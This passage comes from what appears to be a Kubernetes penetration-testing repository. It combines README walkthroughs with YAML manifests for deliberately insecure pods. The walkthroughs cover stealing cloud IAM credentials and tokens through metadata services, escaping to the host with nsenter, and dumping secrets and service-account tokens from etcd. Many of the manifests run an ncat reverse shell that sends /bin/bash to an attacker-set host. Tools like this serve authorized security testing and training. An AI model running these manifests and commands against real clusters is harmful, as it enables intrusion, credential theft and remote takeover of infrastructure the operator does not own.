within the cluster, within the cloud environment, or both. 80 | ### AWS 81 | **Test to see if you have access to the metadata service:** 82 | ```bash 83 | curl http://169.254.169.254/latest/meta-data 84 | #IMDSv2 85 | TOKEN="$(curl --silent -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 600" http://169.254.169.254/latest/api/token)" 86 | curl --silent -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data" 87 | ``` 88 | 89 | 90 | **See if any instance user-data is populated. Look for credentials, kubelet info, or bucket names** 91 | ```bash 92 | curl http://169.254.169.254/latest/user-data 93 | ``` 94 | 95 | **If an IAM role is assigned to the node, you can access the node's IAM credentials** 96 | ``` 97 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ #Lists the role name 98 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] # Get creds 99 | ``` 100 | 101 | **Launch a new pod with the aws-cli** 102 | 103 | If you can query the metadata service, you can proceed with curl, but I suggest deploying another pod with the `amazon/aws-cli` image. This allows you to run `aws` commands as the node. 104 | Something like this: 105 | 106 | ```yaml 107 | apiVersion: v1 108 | kind: Pod 109 | metadata: 110 | name: nothing-allowed-awscli-pod 111 | labels: 112 | app: pentest 113 | spec: 114 | containers: 115 | - name: nothing-allowed-awscli-pod 116 | image: amazon/aws-cli 117 | command: [ "/bin/sh", "-c", "--" ] 118 | args: [ "while true; do sleep 30; done;" ] 119 | ``` 120 | 121 | **Verify you are the node** 122 | ``` 123 | aws sts get-caller-identity 124 | ``` 125 | 126 | **Some recon ideas** 127 | ``` 128 | yum install jq 129 | aws eks get-token --cluster-name clusterName --region us-east-1 | jq .
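# A couple of extra read-only checks (hypothetical region; these assume the
# node's role actually has the corresponding IAM permissions, which it may not):
aws ec2 describe-instances --region us-east-1 --query 'Reservations[].Instances[].InstanceId'
aws secretsmanager list-secrets --region us-east-1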
130 | aws eks describe-cluster --name clusterName 131 | aws s3 ls 132 | 133 | ``` 134 | 135 | ### GCP 136 | Test to see if you have access to the metadata service: 137 | ``` 138 | curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/service-accounts/' 139 | 126817330210-compute@developer.gserviceaccount.com/ 140 | default/ 141 | ``` 142 | 143 | **See the scopes assigned to the default service account** 144 | ``` 145 | curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes 146 | https://www.googleapis.com/auth/devstorage.read_only 147 | https://www.googleapis.com/auth/logging.write 148 | https://www.googleapis.com/auth/monitoring 149 | https://www.googleapis.com/auth/servicecontrol 150 | https://www.googleapis.com/auth/service.management.readonly 151 | https://www.googleapis.com/auth/trace.append 152 | ``` 153 | 154 | **Launch a new pod with the cloud-sdk** 155 | 156 | If you can query the metadata service, you can proceed with curl, but I suggest deploying another pod with the `gcr.io/google.com/cloudsdktool/cloud-sdk:latest` image. This allows you to run `gcloud` and `gsutil` commands as the node. 157 | Something like this: 158 | 159 | ```yaml 160 | apiVersion: v1 161 | kind: Pod 162 | metadata: 163 | name: nothing-allowed-gcloud-pod 164 | labels: 165 | app: pentest 166 | spec: 167 | containers: 168 | - name: nothing-allowed-gcloud-pod 169 | image: gcr.io/google.com/cloudsdktool/cloud-sdk:latest 170 | command: [ "/bin/sh", "-c", "--" ] 171 | args: [ "while true; do sleep 30; done;" ] 172 | ``` 173 | 174 | **Example: Find buckets, list objects, and read file contents** 175 | ``` 176 | root@nothing-allowed-gcloud-pod:/# gsutil ls 177 | gs://playground-test123/ 178 | 179 | root@nothing-allowed-gcloud-pod:/# gsutil ls gs://playground-test123 180 | gs://playground-test123/luggage_combination.txt 181 | 182 | root@nothing-allowed-gcloud-pod:/# gsutil cat gs://playground-test123/luggage_combination.txt 183 | 12345 184 | ``` 185 | 186 | An awesome GCP privesc reference: https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ 187 | 188 | ### Azure 189 | 190 | **Test to see if you have access to the metadata service** 191 | ``` 192 | curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2020-10-01" | jq . 193 | ``` 194 | 195 | **If a managed identity is assigned to the node, you can get an access token for it** 196 | ``` 197 | curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq . 198 | ``` 199 | 200 | **Launch a new pod with the azure-cli** 201 | If you can query the metadata service, you can proceed with curl, but I suggest deploying another pod with the `mcr.microsoft.com/azure-cli` image. This allows you to run `az` commands as the node.
202 | 203 | Something like this: 204 | 205 | ```yaml 206 | apiVersion: v1 207 | kind: Pod 208 | metadata: 209 | name: nothing-allowed-azurecli-pod 210 | labels: 211 | app: pentest 212 | spec: 213 | containers: 214 | - name: nothing-allowed-azurecli-pod 215 | image: mcr.microsoft.com/azure-cli 216 | command: [ "/bin/sh", "-c", "--" ] 217 | args: [ "while true; do sleep 30; done;" ] 218 | ``` 219 | 220 | **Log in as the instance** 221 | ``` 222 | bash-5.0# az login -i 223 | ``` 224 | 225 | **Some recon ideas** 226 | ``` 227 | az storage account list 228 | az aks list 229 | az identity list 230 | az role assignment list 231 | ``` 232 | 233 | ## Overly permissive service account 234 | If the namespace’s default service account is mounted to `/var/run/secrets/kubernetes.io/serviceaccount/token` in your pod and is overly permissive, use that token to further escalate your privileges within the cluster. 235 | 236 | 237 | **Install kubectl in your pod** 238 | ``` 239 | if [ ! -f "/usr/local/bin/kubectl" ]; then 240 | apt update && apt -y install curl 241 | #Download and install kubectl into pod 242 | curl -LO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl" 243 | chmod +x ./kubectl 244 | mv ./kubectl /usr/local/bin/kubectl 245 | fi 246 | ``` 247 | **See what your pod can do** 248 | ``` 249 | kubectl auth can-i --list 250 | ``` 251 | 252 | 253 | ## Anonymous-auth 254 | If either [the apiserver or the kubelets have anonymous-auth set to true](https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/) and there are no network policy controls preventing it, you can interact with them directly without authentication. 255 | 256 | ## Kernel, container engine, or Kubernetes exploits 257 | An unpatched vulnerability in the underlying kernel, in the container engine, or in Kubernetes can potentially allow a container escape, or access to the Kubernetes cluster without any additional permissions, e.g., [CVE-2020-8558](https://github.com/tabbysable/POC-2020-8558). 258 | 259 | ## Hunt for vulnerable services 260 | Your pod likely sees a different view of the cluster's network services than the machine you used to create the pod does. You can hunt for vulnerable services and applications by proxying your traffic through the pod.
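If all you have is a shell in the pod, bash alone is enough for a first sweep. A minimal sketch; the two sample IPs (the API server and cluster DNS ClusterIPs on a default kubeadm install, service CIDR 10.96.0.0/12) and the port list are assumptions to replace with values from your target cluster:

```bash
# Probe common in-cluster ports using bash's /dev/tcp (no extra tools needed)
for ip in 10.96.0.1 10.96.0.10; do
  for port in 53 80 443 2379 6443 8080 8443 10250; do
    timeout 1 bash -c "echo > /dev/tcp/$ip/$port" 2>/dev/null && echo "$ip:$port open"
  done
done
```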
261 | 262 | 263 | 264 | 265 | 266 | # Reference(s): 267 | 268 | * https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ 269 | * https://securekubernetes.com/ 270 | * https://madhuakula.com/kubernetes-goat/ 271 | * https://keramas.github.io/2020/08/10/Recon-Village-CTF-at-DC28.html 272 | * https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/ 273 | * https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/ 274 | * https://github.com/tabbysable/POC-2020-8558 275 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/cronjob/nothing-allowed-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: nothing-allowed-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: nothing-allowed-exec-cronjob 16 | image: ubuntu 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "while true; do sleep 30; done;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | restartPolicy: OnFailure 21 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/cronjob/nothing-allowed-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: nothing-allowed-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: nothing-allowed-revshell-cronjob 16 | image: raesene/ncat 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | restartPolicy: OnFailure 21 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deamonset/nothing-allowed-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: nothing-allowed-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-exec-daemonset 21 | image: ubuntu 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deamonset/nothing-allowed-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: nothing-allowed-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 
| selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-revshell-daemonset 21 | image: raesene/ncat 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deployment/nothing-allowed-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: nothing-allowed-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: nothing-allowed-exec-deployment 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deployment/nothing-allowed-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: nothing-allowed-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: nothing-allowed-revshell-deployment 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/job/nothing-allowed-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: nothing-allowed-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: nothing-allowed-exec-job 13 | image: ubuntu 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "while true; do sleep 30; done;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 17 | restartPolicy: OnFailure 18 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/job/nothing-allowed-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: nothing-allowed-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: 
nothing-allowed-revshell-job 13 | image: raesene/ncat 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 17 | restartPolicy: OnFailure 18 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: nothing-allowed-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: nothing-allowed-pod 10 | image: ubuntu 11 | command: [ "/bin/sh", "-c", "--" ] 12 | args: [ "while true; do sleep 30; done;" ] 13 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/nothing-allowed/pod/nothing-allowed-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: nothing-allowed-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: nothing-allowed-pod 10 | image: raesene/ncat 11 | command: [ "/bin/sh", "-c", "--" ] 12 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 13 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/nothing-allowed/replicaset/nothing-allowed-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: nothing-allowed-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-exec-replicaset 21 | image: ubuntu 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/replicaset/nothing-allowed-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: nothing-allowed-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-revshell-replicaset 21 | image: raesene/ncat 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | 
-------------------------------------------------------------------------------- /manifests/nothing-allowed/replicationcontroller/nothing-allowed-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: nothing-allowed-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: nothing-allowed-exec-replicationcontroller 21 | image: ubuntu 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/replicationcontroller/nothing-allowed-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: nothing-allowed-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: nothing-allowed-revshell-replicationcontroller 21 | image: raesene/ncat 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/statefulset/nothing-allowed-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: nothing-allowed-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: nothing-allowed-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: nothing-allowed-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: nothing-allowed-exec-statefulset 37 | image: ubuntu 38 | command: [ "/bin/sh", "-c", "--" ] 39 | args: [ "while true; do sleep 30; done;" ] 40 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 41 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/statefulset/nothing-allowed-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: 
nothing-allowed-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: nothing-allowed-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: nothing-allowed-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: nothing-allowed-revshell-statefulset 37 | image: raesene/ncat 38 | command: [ "/bin/sh", "-c", "--" ] 39 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 40 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 41 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #2: Privileged and hostPID 2 | ![](../../.github/images/Pod2.jpg) 3 | 4 | In this scenario, the only thing that changes from the everything-allowed pod is how you gain root access to the host. Rather than chrooting to the host’s filesystem, you can use `nsenter` to get a root shell on the node running your pod. 5 | 6 | Why does it work? 7 | 8 | * **Privileged** - The `privileged: true` container-level security context breaks down almost all the walls that containers are supposed to provide. The PID namespace is one of the few walls that stands, however. Without `hostPID`, `nsenter` would only work to enter the namespaces of a process running within the container. For more examples of what you can do with only `privileged: true`, refer to the next example, Bad Pod #3: Privileged Only. 9 | * **Privileged + hostPID** - When both `hostPID: true` and `privileged: true` are set, the pod can see all of the processes on the host, and you can enter the namespaces of the host's init process (PID 1) and execute a shell on the node, as shown in the one-liner below.
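For reference, this is the namespace-entry one-liner that the manifests in this directory use. You can also run it manually from a shell in any pod that has both `hostPID: true` and `privileged: true`:

```bash
# Enter the mount, UTS, IPC, network, and PID namespaces of the host's init
# process (PID 1) and spawn a bash shell there, giving you root on the node
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
```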
10 | 11 | Once you are root on the host, the privilege escalation paths are all the same as those described in Bad Pod #1: Everything-allowed. 12 | 13 | ## Table of Contents 14 | - [Pod creation & access](#pod-creation--access) 15 | - [Exec pods](#exec-pods) 16 | - [Reverse shell pods](#reverse-shell-pods) 17 | - [Deleting resources](#deleting-resources) 18 | - [Post exploitation](#post-exploitation) 19 | - [Can you run your pod on a control-plane node](#can-you-run-your-pod-on-a-control-plane-node) 20 | - [Read secrets from etcd](#read-secrets-from-etcd) 21 | - [Look for kubeconfigs in the host filesystem](#look-for-kubeconfigs-in-the-host-filesystem) 22 | - [Grab all tokens from all pods on the system](#grab-all-tokens-from-all-pods-on-the-system) 23 | - [Some other ideas](#some-other-ideas) 24 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 25 | - [Demonstrate impact](#demonstrate-impact) 26 | - [References and further reading:](#references-and-further-reading) 27 | 28 | # Pod creation & access 29 | 30 | ## Exec pods 31 | Create one or more of these resource types and exec into the pod: 32 | 33 | **Pod** 34 | ```bash 35 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 36 | kubectl exec -it priv-and-hostpid-exec-pod -- bash 37 | ``` 38 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 39 | 40 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 41 | 42 | ```bash 43 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/[RESOURCE_TYPE]/priv-and-hostpid-exec-[RESOURCE_TYPE].yaml 44 | kubectl get pods | grep priv-and-hostpid-exec-[RESOURCE_TYPE] 45 | kubectl exec -it priv-and-hostpid-exec-[RESOURCE_TYPE]-[ID] -- bash 46 | ``` 47 | 48 | *Keep in mind that if a pod security policy blocks the pod, the resource type will still get created; the admission controller only blocks the pods that the resource type tries to create.* 49 | 50 | To troubleshoot a case where you don't see pods, use `kubectl describe`: 51 | 52 | ``` 53 | kubectl describe [RESOURCE_TYPE] priv-and-hostpid-exec-[RESOURCE_TYPE] 54 | ``` 55 | 56 | ## Reverse shell pods 57 | Create one or more of these resources and catch the reverse shell: 58 | 59 | **Step 1: Set up listener** 60 | ```bash 61 | ncat --ssl -vlp 3116 62 | ``` 63 | 64 | **Step 2: Create the pod from the local manifest without modifying it, using environment variables and envsubst** 65 | 66 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 67 | * Replace the HOST and PORT values to point the reverse shell to your listener 68 | 69 | ```bash 70 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/priv-and-hostpid/[RESOURCE_TYPE]/priv-and-hostpid-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 71 | ``` 72 | 73 | **Step 3: Catch the shell** 74 | ```bash 75 | $ ncat --ssl -vlp 3116 76 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 77 | Ncat: Listening on :::3116 78 | Ncat: Listening on 0.0.0.0:3116 79 | Connection received on 10.0.0.162 42035 80 | ``` 81 | 82 | ## Deleting resources 83 | You can delete a resource using its manifest, or by name.
Here are some examples: 84 | ``` 85 | kubectl delete [type] [resource-name] 86 | kubectl delete -f manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 87 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 88 | kubectl delete pod priv-and-hostpid-exec-pod 89 | kubectl delete cronjob priv-and-hostpid-exec-cronjob 90 | ``` 91 | 92 | # Post exploitation 93 | 94 | ## Can you run your pod on a control-plane node 95 | The pod you created above was likely scheduled on a worker node. Before jumping into post exploitation on the worker node, it is worth seeing if you can run a pod on a control-plane node. If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. This is not possible on cloud-managed Kubernetes clusters like GKE and EKS, because they hide the control-plane nodes. 96 | 97 | **Get nodes** 98 | ``` 99 | kubectl get nodes 100 | NAME STATUS ROLES AGE VERSION 101 | k8s-control-plane Ready master 93d v1.19.1 102 | k8s-worker Ready 93d v1.19.1 103 | ``` 104 | 105 | **Pick your manifest, then uncomment the nodeName field and update it with the name of the control-plane node** 106 | ``` 107 | nodeName: k8s-control-plane 108 | ``` 109 | **Create your pod** 110 | ``` 111 | kubectl apply -f manifests/priv-and-hostpid/job/priv-and-hostpid-exec-job.yaml 112 | ``` 113 | 114 | ### Read secrets from etcd 115 | If you were able to schedule your pod on a control-plane node, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. 116 | 117 | Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion.
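If `etcdctl` happens to be installed on the node, you can also query `etcd` directly instead of carving strings out of the database file. A minimal sketch, assuming a `kubeadm` cluster where `etcd` listens on localhost and uses the default certificate paths (adjust the endpoint and paths for your environment):

```bash
# List every secret key stored in etcd, authenticating with the
# control-plane node's own etcd certificates (kubeadm default locations)
ETCDCTL_API=3 etcdctl \
  --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets --prefix --keys-only
```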
118 | 119 | **Check to see if `etcd` is running on the control-plane node and find out where the database is (this example is from a `kubeadm`-created cluster)** 120 | ``` 121 | root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir 122 | ``` 123 | Output: 124 | ``` 125 | data-dir=/var/lib/etcd 126 | ``` 127 | **View the data in the `etcd` database:** 128 | ``` 129 | strings /var/lib/etcd/member/snap/db | less 130 | ``` 131 | 132 | **Extract the tokens from the database and show the service account name** 133 | ``` 134 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done 135 | ``` 136 | 137 | **Same command, but with some greps to return only the default token in the kube-system namespace** 138 | ``` 139 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default 140 | ``` 141 | Output: 142 | ``` 143 | 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] 144 | ``` 145 | 146 | 147 | ## Look for kubeconfigs in the host filesystem 148 | 149 | By default, nodes don't have `kubectl` installed. If you are lucky though, an administrator tried to make their life (and yours) a little easier by installing `kubectl` and their highly privileged credentials on the node. (We're not so lucky on this GKE node.) 150 | 151 | **Some ideas:** 152 | ```bash 153 | find / -name kubeconfig 154 | find / -name .kube 155 | grep -R "current-context" /home/ 156 | grep -R "current-context" /root/ 157 | ``` 158 | 159 | ## Grab all tokens from all pods on the system 160 | You can access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod with a mounted *token* that is bound to a *service account* that is bound to a *clusterrolebinding* that gives you access to do things like create pods or view secrets in all namespaces. 161 | 162 | Look for tokens that have permissions to get secrets in kube-system.
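To check a single token by hand, you can fetch it with `kubectl exec` and pass it straight to `kubectl` via the `--token` argument. A minimal sketch, run from a machine where kubectl is configured and NOT from within the priv pod ([POD_UID] and [SECRET_NAME] are placeholders for values you will find on the node):

```bash
# Read one token off the node through the pod, then ask the API server what it can do
token=$(kubectl exec priv-and-hostpid-exec-pod -- cat /var/lib/kubelet/pods/[POD_UID]/volumes/kubernetes.io~secret/[SECRET_NAME]/token)
kubectl --token=$token auth can-i get secrets -n kube-system
```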
